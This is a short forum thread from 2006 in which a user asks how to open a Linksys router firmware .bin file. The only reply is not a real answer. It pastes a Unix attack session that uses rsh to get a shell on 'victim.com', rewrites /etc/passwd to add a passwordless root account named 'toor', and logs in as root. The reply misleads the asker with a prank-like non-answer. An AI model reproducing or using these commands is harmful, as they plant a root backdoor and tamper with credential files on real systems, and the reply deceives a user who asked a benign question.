| Author |
Message |
Rockey Guest
Posts: 59716
Offline
|
Posted: Mon Feb 13, 2006 12:20 pm Post subject: Wireless Router |
|
|
I have been trying to open a file from the linksys site. Its the firm ware for my router however its a bin file and I cant open it. How do I open a bin file.
Rockey |
|
| Back to top |
|
 |
abc_jack
Joined: 08 Aug 2005 Posts: 59
Offline
|
Posted: Mon May 22, 2006 9:50 am Post subject: open bin file |
|
|
try to do this
evil % whoami
bin
evil % rsh victim.com csh -i
Warning: no access to tty; thus no job control in this shell...
victim % ls -ldg /etc
drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
victim % cd /etc
victim % mv passwd pw.old
victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
victim % ^D
evil % rlogin victim.com -l toor
Welcome to victim.com!
victim # |
|
| Back to top |
|
 |
|
|